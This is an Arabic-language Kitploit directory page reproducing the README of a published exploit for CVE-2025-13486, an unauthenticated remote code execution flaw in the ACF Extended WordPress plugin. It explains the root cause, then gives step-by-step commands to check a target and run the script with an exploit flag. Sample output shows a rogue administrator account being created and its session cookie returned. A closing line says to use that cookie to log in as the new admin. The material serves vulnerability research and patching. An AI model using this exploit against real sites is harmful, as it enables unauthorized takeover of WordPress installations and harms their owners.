Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-13486 — CVE-2025-13486 - استغلال تنفيذ التعليمات البرمجية عن بُعد وتصعيد الامتيازات | Kitploit
أدوات/GitHubGitHub/whattheslime/cve-2025-13486
تصعيد الامتيازاتتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubwhattheslime/cve-2025-13486

CVE-2025-13486

CVE-2025-13486 - استغلال تنفيذ التعليمات البرمجية عن بُعد وتصعيد الامتيازات

عرض المستودع
11منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-13486

إضافة ACF Extended لـ WordPress — تنفيذ التعليمات البرمجية عن بُعد وتصعيد الامتيازات

استغلال CVE-2025-13486 اكتشفه Marcin Dudek (dudekmar)

⚠️ إخلاء مسؤولية

هذا المستودع مُقدَّم لأغراض البحث والأمن الدفاعي فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه المعلومات.


📌 نظرة عامة

إضافة Advanced Custom Fields: Extended (ACFE) لـ WordPress معرضة لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في الإصدارات من 0.9.0.5 إلى 0.9.1.1.

توجد الثغرة في الدالة prepare_form()، التي تقبل مدخلات يتحكم فيها المستخدم وتمررها إلى call_user_func_array() دون تحقق مناسب.

يسمح ذلك للمهاجمين غير المصادق عليهم بتنفيذ أكواد PHP عشوائية على الخادم بشكل محدود، ومع ذلك فهو كافٍ لإنشاء حساب مسؤول وتسجيل الدخول.


🔬 تحليل السبب الجذري

سلسلة الثغرة كالتالي:

  1. includes/modules/form/module-form-front.php:24 -> يؤدي إجراء wp_ajax_nopriv_acfe/form/render_form_ajax إلى تشغيل معالج render_form_ajax.

  2. includes/modules/form/module-form-front.php:492 -> يتم تطبيق الفلتر acfe/form/prepare_form، مما يستدعي الدالة prepare_form().

  3. includes/modules/form/module-form-front-render.php:151 -> يتم تمرير بيانات $form التي يتحكم فيها المستخدم مباشرة إلى call_user_func_array().


🎯 الاستغلال

  1. ثبّت تبعيات بايثون:

    root@kitploit:~
    python3 -m venv venv
    venv/bin/pip install -r requirements.txt
    
  2. حدّد هدف WordPress معرضًا للثغرة.

    يجب أن يحتوي الهدف على صفحة بها نموذج مولّد بواسطة ACFE.

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
    

    مثال على المخرجات:

    root@kitploit:~
    [2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
    
  3. أعد تشغيل البرنامج النصي مع استخدام الخيار --exploit:

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
    

    مثال على المخرجات:

    root@kitploit:~
    [2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
    [2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
    [2025-12-19] [11:00:14] [success] Authentication succeded!
    [2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
    

📚 المراجع

  • https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
  • https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
تنزيل الأداة
  • استخدم كوكي المصادقة الذي أعاده WordPress لتسجيل الدخول عبر حساب المسؤول الذي تم إنشاؤه حديثًا.